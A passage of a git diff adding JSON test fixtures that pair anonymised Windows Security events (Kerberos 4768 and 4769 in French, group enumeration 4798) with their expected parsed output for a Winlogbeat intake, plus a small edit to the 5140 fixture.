chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}", + "event": { + "action": "Service d\u2019authentification Kerberos", + "code": "4768", + "kind": "event", + "module": "security", + "original": "Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount\n\tNom du domaine Kerberos fourni :\tDOMAIN\n\tID de l\u2019utilisateur :\t\t\tS-1-2-3\n\nInformations sur le service :\n\tNom du service :\t\tservice\n\tID du service :\t\tS-1-2-3-4-5\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t51261\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810010\n\tCode de r\u00e9sultat :\t\t0x0\n\tType de chiffrement du ticket :\t0x12\n\tType de pr\u00e9-authentification :\t2\n\nInformations sur le certificat :\n\tNom de l\u2019\u00e9metteur du certificat :\t\t\n\tNum\u00e9ro de s\u00e9rie du certificat :\t\n\t Empreinte num\u00e9rique du certificat :\t\t\n\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\n\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:17:10.124000Z", + "action": { + "id": 4768, + "outcome": "success", + "properties": { + "IpAddress": "::ffff:1.2.3.4", + "IpPort": "51261", + "PreAuthType": "2", + "ServiceName": "service", + "ServiceSid": "S-1-2-3-4-5", + "Status": "0x0", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3", + "TargetUserName": "account", + "TicketEncryptionType": "0x12", + "TicketOptions": "0x40810010" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "HOSTNAME.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "ip": [ + "::ffff:102:304" + ], + "user": [ + "account" + ] + }, + "service": { + "name": "service" + }, + "source": { + "address": "::ffff:102:304", + "ip": "::ffff:102:304", + "port": 51261 + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "account", + "target": { + "domain": "DOMAIN", + "name": "account" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOSTNAME.domain.priv", + "event_data": { + "StatusDescription": "KDC_ERR_NONE" + }, + "event_id": "4768", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "opcode": "Informations", + "process": { + "pid": 560, + "thread": { + "id": 3228 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "2476587536", + "task": "Service d\u2019authentification Kerberos" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4769.json b/Beats/winlogbeat/tests/security_event_4769.json new file mode 100644 index 000000000..ac4cdd94d --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4769.json @@ -0,0 +1,101 @@ +{ + "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}", + "event": { + "action": "Op\u00e9rations de ticket du service Kerberos", + "code": "4769", + "kind": "event", + "module": "security", + "original": "Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount@DOMAIN.PRIV\n\tDomaine du compte :\t\tDOMAIN.PRIV\n\tGUID d\u2019ouverture de session :\t\t{12345678-ABCD-EF90-1234-123456ABCDEF}\n\nInformations sur le service :\n\tNom du service :\t\tSERVICE$\n\tID du service :\t\tS-1-2-3\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t50754\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810000\n\tType de chiffrement du ticket :\t0x12\n\tCode d\u2019\u00e9chec :\t\t0x0\n\tServices en transit :\t-\n\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\n\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\n\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:17:02.856000Z", + "action": { + "id": 4769, + "outcome": "success", + "properties": { + "IpAddress": "::ffff:1.2.3.4", + "IpPort": "50754", + "LogonGuid": "{12345678-ABCD-EF90-1234-123456ABCDEF}", + "ServiceName": "SERVICE$", + "ServiceSid": "S-1-2-3", + "Status": "0x0", + "TargetDomainName": "DOMAIN.PRIV", + "TargetUserName": "account@DOMAIN.PRIV", + "TicketEncryptionType": "0x12", + "TicketOptions": "0x40810000", + "TransmittedServices": "-" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "HOST01.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "ip": [ + "::ffff:102:304" + ], + "user": [ + "account" + ] + }, + "service": { + "name": "SERVICE$" + }, + "source": { + "address": "::ffff:102:304", + "ip": "::ffff:102:304", + "port": 50754 + }, + "user": { + "domain": "DOMAIN.PRIV", + "name": "account", + "target": { + "domain": "DOMAIN.PRIV", + "name": "account@DOMAIN.PRIV" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOST01.domain.priv", + "event_data": { + "StatusDescription": "KDC_ERR_NONE" + }, + "event_id": "4769", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "opcode": "Informations", + "process": { + "pid": 560, + "thread": { + "id": 7992 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "2476587153", + "task": "Op\u00e9rations de ticket du service Kerberos" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4798.json b/Beats/winlogbeat/tests/security_event_4798.json new file mode 100644 index 000000000..3e7783fbd --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4798.json @@ -0,0 +1,114 @@ +{ + "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4798", + "kind": "event", + "module": "security", + "original": "A user's local group membership was enumerated.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACC0123$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nUser:\n\tSecurity ID:\t\tS-3-4-5\n\tAccount Name:\t\tGuest\n\tAccount Domain:\t\tACC0123\n\nProcess Information:\n\tProcess ID:\t\t0x123\n\tProcess Name:\t\tC:\\Program Files\\program.exe", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:25:34.741000Z", + "action": { + "id": 4798, + "outcome": "success", + "properties": { + "CallerProcessId": "0x123", + "CallerProcessName": "C:\\Program Files\\program.exe", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "ACC0123$", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "ACC0123", + "TargetSid": "S-3-4-5", + "TargetUserName": "Guest" + } + }, + "agent": { + "ephemeral_id": "12345678-90ab-cdef-1234-123456abcdef", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "name": "ACC0123", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "hostname", + "id": "12345678-90ef-abcd-1234-abcdef123456", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "hostname", + "os": { + "build": "20348.169", + "family": "windows", + "kernel": "10.0.20348.169 (WinBuild.160101.0800)", + "name": "Windows Server 2022 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "hostname" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "ACC0123" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "ACC0123", + "target": { + "domain": "ACC0123", + "name": "Guest" + } + }, + "winlog": { + "activity_id": "{11111111-2222-3333-4444-555555555555}", + "api": "wineventlog", + "channel": "Security", + "computer_name": "ACC0123.johndoe.com", + "event_id": "4798", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x3e7" + }, + "opcode": "Info", + "process": { + "pid": 668, + "thread": { + "id": 8860 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "1524672", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_5140.json b/Beats/winlogbeat/tests/security_event_5140.json index cde1d5c3c..8413484f9 100644 --- a/Beats/winlogbeat/tests/security_event_5140.json +++ b/Beats/winlogbeat/tests/security_event_5140.json @@ -93,11 +93,6 @@ "api": "wineventlog", "channel": "Security", "computer_name": "HOST01.company.test", - "event_data": { - "AccessMaskDescription": [ - "Create Child" - ] - }, "event_id": "5140", "keywords": [ "Audit Success" diff --git a/Beats/winlogbeat/tests/security_event_5145.json 